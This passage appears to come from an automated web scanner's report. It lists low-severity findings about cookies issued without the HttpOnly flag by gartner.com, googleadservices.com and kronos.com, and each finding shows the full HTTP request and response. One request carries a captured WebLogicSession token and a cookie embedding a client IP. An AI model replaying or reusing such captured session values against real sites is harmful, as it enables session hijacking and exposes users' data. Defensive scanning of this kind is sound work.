Content-type: text/css
Last-modified: Fri, 25 Feb 2011 23:13:43 GMT
ETag: "pvc271f234619de471c86331d0781b0d8c"
Expires: Sat, 15 Oct 2011 01:46:25 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151050.RA0.G24F27.U45C73E2A].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:15 GMT
Age: 1593
Set-Cookie: TS83f541=f05c972c9edfede56a32664676fbba226bee90621e4ceb474db564e2; Path=/
Content-Length: 11084

/* TAG STYLES */
a {
color:#308ACF;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
ul {
list-style:disc;
}
body {
font-family: Verdana, Geneva, Arial, Helv
...[SNIP]...

16.169. http://www.gartner.com/0_admin/css/docverterNGRA.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/0_admin/css/docverterNGRA.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS83f541=6b2da585a63dda664aed29accddacf18a0a6c3165b9afd464db564e3; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/css/docverterNGRA.css;pv5baab6279b42fad0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: text/css
Last-modified: Fri, 25 Feb 2011 23:13:44 GMT
ETag: "pv5baab6279b42fad0267d731fc0b91143"
Expires: Sat, 15 Oct 2011 01:46:25 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151050.RA0.G24F27.U837B2039].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:16 GMT
Age: 1594
Set-Cookie: TS83f541=6b2da585a63dda664aed29accddacf18a0a6c3165b9afd464db564e3; Path=/
Content-Length: 10459

/* stylesheet extracted from owner.html (originally update.html) */

.dv_tableTextIndent1 {
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
font-size: 75%;
font-style: normal
...[SNIP]...

16.170. http://www.gartner.com/0_admin/images/documentdisplay/blue_gt_bullet.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/0_admin/images/documentdisplay/blue_gt_bullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS83f541=aba30e374a2f00546378de7d4c8c3d19fd2bfd7686808ebd4db564e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/blue_gt_bullet.gif;pvfba64ef8951859f0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:43 GMT
ETag: "pvfba64ef8951859f02fde94375233778f"
Expires: Wed, 19 Oct 2011 00:02:34 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.U3CEF9F60].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:19 GMT
Age: 6798
Content-Length: 53
Set-Cookie: TS83f541=aba30e374a2f00546378de7d4c8c3d19fd2bfd7686808ebd4db564e7; Path=/

GIF89a
......0.....!.......,....
.........y...|MV...;

16.171. http://www.gartner.com/0_admin/images/documentdisplay/blue_v_bullet.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/0_admin/images/documentdisplay/blue_v_bullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS83f541=f92d843d05fbcc91242d73f86afd887b35a0406515b877a04db564e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/blue_v_bullet.gif;pvf70f576bef1d3ed9 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:42 GMT
ETag: "pvf70f576bef1d3ed914b4c704f3d7d488"
Expires: Sat, 15 Oct 2011 01:48:24 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.UA511F917].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:19 GMT
Age: 6519
Content-Length: 54
Set-Cookie: TS83f541=f92d843d05fbcc91242d73f86afd887b35a0406515b877a04db564e7; Path=/

GIF89a
......0.....!.......,....
...........B.M.jm..;

16.172. http://www.gartner.com/0_admin/images/documentdisplay/dl_pdf.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/0_admin/images/documentdisplay/dl_pdf.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS83f541=0368e5dfa99e4c7c60288dc0b1bfc0e6c6ad2c65177a6bb94db564e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/dl_pdf.gif;pv645290f3cec6f422 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:43 GMT
ETag: "pv645290f3cec6f4224870b721aa89cdc0"
Expires: Sat, 15 Oct 2011 01:59:12 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.UE046FD5E].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:19 GMT
Age: 3681
Content-Length: 167
Set-Cookie: TS83f541=0368e5dfa99e4c7c60288dc0b1bfc0e6c6ad2c65177a6bb94db564e7; Path=/

GIF89a-......333fff......!.......,....-.....x........a....fzYm.hu...*f..
........N...8.x..h9..H..2....e.*.;A.FI...;(pz....-(.K...QN./.H..yoGT...F..WH...h.....@YiY..;

16.173. http://www.gartner.com/0_admin/images/documentdisplay/gartner_logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/0_admin/images/documentdisplay/gartner_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS83f541=c4a433b35f9229efc4f43fa5771e388590ef3992c872d9cb4db564e6; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/gartner_logo.gif;pv0fa3dd26dbfd16cf HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:42 GMT
ETag: "pv0fa3dd26dbfd16cf7bf6517dac53138e"
Expires: Sat, 15 Oct 2011 01:48:24 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.UCBD93627].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:18 GMT
Age: 6545
Content-Length: 683
Set-Cookie: TS83f541=c4a433b35f9229efc4f43fa5771e388590ef3992c872d9cb4db564e6; Path=/

GIF89af.#.............uuu```jjj..............................UUU.............................................!.......,....f.#.... $.di.h..l..p,.tm.x..|....pH,..HWC.h"..h.pxX.... .B...U..&...!Wh:....kx
...[SNIP]...

16.174. http://www.gartner.com/0_admin/images/documentdisplay/gray_gt_bullet.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/0_admin/images/documentdisplay/gray_gt_bullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS83f541=8153a0f0aebadf3529c552e0069558fe46a150634031125f4db564e6; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/gray_gt_bullet.gif;pv01523c4179af4095 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:43 GMT
ETag: "pv01523c4179af4095ceb8d97f4e60e435"
Expires: Sat, 15 Oct 2011 01:48:24 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.UB19576C9].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:18 GMT
Age: 2201
Content-Length: 54
Set-Cookie: TS83f541=8153a0f0aebadf3529c552e0069558fe46a150634031125f4db564e6; Path=/

GIF89a . ....0Pf...!.......,.... . .....y....Ts5z.*.;

16.175. http://www.gartner.com/0_admin/images/documentdisplay/research_logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/0_admin/images/documentdisplay/research_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS83f541=55932c82d7bffac30a01820f4d53983643af129e3519d40b4db564e6; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/research_logo.gif;pv0f8cc4fa2994f3d2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:44 GMT
ETag: "pv0f8cc4fa2994f3d2727b91b04e34e9bc"
Expires: Sat, 15 Oct 2011 01:50:09 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.U7BFAEE3F].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:18 GMT
Age: 5032
Content-Length: 620
Set-Cookie: TS83f541=55932c82d7bffac30a01820f4d53983643af129e3519d40b4db564e6; Path=/

GIF89aw.#..........```.........wwwlll.....................UUU!.......,....w.#......I..8....`(.di.h..l..p,.tm.x..|..@..@,..A...k8..g......g`.%<.U...%S..G!,...f
..h4........
.u.H.....u..
...c...3s.N...
...[SNIP]...

16.176. http://www.gartner.com/DisplayDocument previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/DisplayDocument

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DisplayDocument?doc_cd=127481 HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; TS83f541=f40dc0e11f368c4df2fa775e78c36fb10621405c7f8621844db56269; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303732853510:ss=1303732853510
If-None-Match: "pv33052ebdba339285631c49a7e3f502be"

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: Servlet/2.5 JSP/2.1
Content-type: text/html; charset=iso-8859-1
Date: Mon, 25 Apr 2011 12:10:49 GMT
ETag: "pv33052ebdba339285631c49a7e3f502be"
Expires: 0
Cache-Control: must-revalidate, no-cache
Pragma: no-cache
X-PvInfo: [S10202.C10821.A151087.RA0.G24F28.UC3B8E66B].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; Path=/
Content-Length: 29490

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Improve IT Security With Vulnerability Management</title>
<meta http-equiv=Content-Type content="text/html; ch
...[SNIP]...

16.177. http://www.gartner.com/images/x.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/images/x.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS83f541=f398a42a900447acbbf881d8c89365b982b76feb75cf37d54db564e6; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/x.gif;pv0ef9116c348ac829 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:44 GMT
ETag: "pv0ef9116c348ac829060bb55f994d5974"
Expires: Sat, 15 Oct 2011 01:48:24 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A150953.RA0.G24F27.U9481F6C2].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:18 GMT
Age: 6518
Content-Length: 43
Set-Cookie: TS83f541=f398a42a900447acbbf881d8c89365b982b76feb75cf37d54db564e6; Path=/

GIF89a.............!.......,............Q.;

16.178. http://www.gartner.com/js/utility.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/js/utility.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS83f541=6122e271e953b2f4fbd9c22dfd419e57ca690f7bec2de55c4db564e5; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/utility.js;pv1a5d4f2c9f594bc0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: application/x-javascript
Last-modified: Fri, 25 Feb 2011 23:13:42 GMT
ETag: "pv1a5d4f2c9f594bc0880fa3d283482a64"
Expires: Sat, 15 Oct 2011 01:45:58 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A150946.RA0.G24F27.UF4CE7865].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:17 GMT
Age: 925
Set-Cookie: TS83f541=6122e271e953b2f4fbd9c22dfd419e57ca690f7bec2de55c4db564e5; Path=/
Content-Length: 29773

// Utility.js - Copyright (c) 2000, 2001, 2002 Gartner Inc. All rights reserved.
// Modified clickBetaSearchLink() method to open BetaSearchLanding.jsp for g.com 6.12
// --Shrileckha Chaithanya

...[SNIP]...

16.179. http://www.gartner.com/js/webtrendsCookies.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/js/webtrendsCookies.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS83f541=0b6ddca919a34ed950a9046c9610c06d9fb938034b32c76f4db564e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/webtrendsCookies.js;pv072e3556793072f4 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: application/x-javascript
Last-modified: Fri, 25 Feb 2011 23:13:43 GMT
ETag: "pv072e3556793072f426af3f74ac54883a"
Expires: Sat, 15 Oct 2011 01:45:56 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A150946.RA0.G24F27.U74878798].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:19 GMT
Age: 4918
Set-Cookie: TS83f541=0b6ddca919a34ed950a9046c9610c06d9fb938034b32c76f4db564e7; Path=/
Content-Length: 1124




var logServer="";
if ((window.location.hostname ==
...[SNIP]...

16.180. http://www.googleadservices.com/pagead/conversion/1069716420/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1069716420/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Conversion=CoQBQ09EekZUV0sxVGJfZ0U0R2cwQUdYN3JSRWtxN3kxZ0dDdWRIcEY2aW4xelFRQlNnSVVPYkkxSkwtX19fX193Rmd5ZTZEaVBDajdCS2dBY1NuaXY0RHlBRUJxZ1FkVDlCM25fb29MRUpqNG1qVURxN2pSSnI5MHJYMUcyRzF1anlTVWI4EhMIvOfSos-3qAIVCX_lCh3hL5EIGAAglMmkrsK0tcwiSAE; expires=Wed, 25-May-2011 12:00:31 GMT; path=/pagead/conversion/1069716420/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/conversion/1069716420/?random=1303743156487&cv=6&fst=1303743156487&num=1&fmt=3&value=0&label=dwuECKKVsQEQxKeK_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=5&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&url=http%3A//www.eset.com/us/ HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Conversion=CoQBQ09EekZUV0sxVGJfZ0U0R2cwQUdYN3JSRWtxN3kxZ0dDdWRIcEY2aW4xelFRQlNnSVVPYkkxSkwtX19fX193Rmd5ZTZEaVBDajdCS2dBY1NuaXY0RHlBRUJxZ1FkVDlCM25fb29MRUpqNG1qVURxN2pSSnI5MHJYMUcyRzF1anlTVWI4EhMIvOfSos-3qAIVCX_lCh3hL5EIGAEgm5-68LGAgJTgAUgB

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Mon, 25 Apr 2011 15:14:28 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: Conversion=CoQBQ09EekZUV0sxVGJfZ0U0R2cwQUdYN3JSRWtxN3kxZ0dDdWRIcEY2aW4xelFRQlNnSVVPYkkxSkwtX19fX193Rmd5ZTZEaVBDajdCS2dBY1NuaXY0RHlBRUJxZ1FkVDlCM25fb29MRUpqNG1qVURxN2pSSnI5MHJYMUcyRzF1anlTVWI4EhMIvOfSos-3qAIVCX_lCh3hL5EIGAAglMmkrsK0tcwiSAE; expires=Wed, 25-May-2011 12:00:31 GMT; path=/pagead/conversion/1069716420/
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1069716420/?random=1303743156487&cv=6&fst=1303743156487&num=1&fmt=3&value=0&label=dwuECKKVsQEQxKeK_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=5&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&url=http%3A//www.eset.com/us/&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

16.181. http://www.googleadservices.com/pagead/conversion/1072501689/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1072501689/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Conversion=CoMBQ0NlaVJUV0sxVGJfZ0U0R2cwQUdYN3JSRWtLcXFINWFWb05BT19aMkZXUkFJS0FoUWo1T1c2UF9fX19fX0FXREo3b09JOEtQc0VxQUJ1YWUwX3dQSUFRR3FCQjFQMENmTDFTZ3NRV1BpYU5RT3J1TWttYjNZdGZVYlliVzZQSkpSdncSEwi_vf-kz7eoAhUE3uAKHZUYjgsYACCrq-zczvrRxb0BSAE; expires=Wed, 25-May-2011 12:00:36 GMT; path=/pagead/conversion/1072501689/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/conversion/1072501689/?random=1303733542110&cv=6&fst=1303733542110&num=1&fmt=1&value=1&label=pageview&bg=FFFFFF&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&ref=http%3A//www.manageengine.com/products/security-manager/store.html&url=http%3A//www.manageengine.com/products/security-manager/download.html HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/download.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Conversion=CoMBQ0NlaVJUV0sxVGJfZ0U0R2cwQUdYN3JSRWtLcXFINWFWb05BT19aMkZXUkFJS0FoUWo1T1c2UF9fX19fX0FXREo3b09JOEtQc0VxQUJ1YWUwX3dQSUFRR3FCQjFQMENmTDFTZ3NRV1BpYU5RT3J1TWttYjNZdGZVYlliVzZQSkpSdncSEwi_vf-kz7eoAhUE3uAKHZUYjgsYASDO0K-h-qz6mWtIAQ

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Mon, 25 Apr 2011 12:12:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Set-Cookie: Conversion=CoMBQ0NlaVJUV0sxVGJfZ0U0R2cwQUdYN3JSRWtLcXFINWFWb05BT19aMkZXUkFJS0FoUWo1T1c2UF9fX19fX0FXREo3b09JOEtQc0VxQUJ1YWUwX3dQSUFRR3FCQjFQMENmTDFTZ3NRV1BpYU5RT3J1TWttYjNZdGZVYlliVzZQSkpSdncSEwi_vf-kz7eoAhUE3uAKHZUYjgsYACCrq-zczvrRxb0BSAE; expires=Wed, 25-May-2011 12:00:36 GMT; path=/pagead/conversion/1072501689/
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072501689/?random=1303733542110&cv=6&fst=1303733542110&num=1&fmt=1&value=1&label=pageview&bg=FFFFFF&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&ref=http%3A//www.manageengine.com/products/security-manager/store.html&url=http%3A//www.manageengine.com/products/security-manager/download.html&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 378

<html><body bgcolor="#ffffff" link="#000000" alink="#000000" vlink="#000000" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans
...[SNIP]...

16.182. http://www.kronos.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kronos.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.kronos.com&SiteLanguage=1033; path=/
EktGUID=91eff232-0ee4-4940-9643-e76914405540; expires=Wed, 25-Apr-2012 13:33:41 GMT; path=/
EkAnalytics=newuser; expires=Wed, 25-Apr-2012 13:33:41 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:33:42 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.kronos.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=91eff232-0ee4-4940-9643-e76914405540; expires=Wed, 25-Apr-2012 13:33:41 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Wed, 25-Apr-2012 13:33:41 GMT; path=/
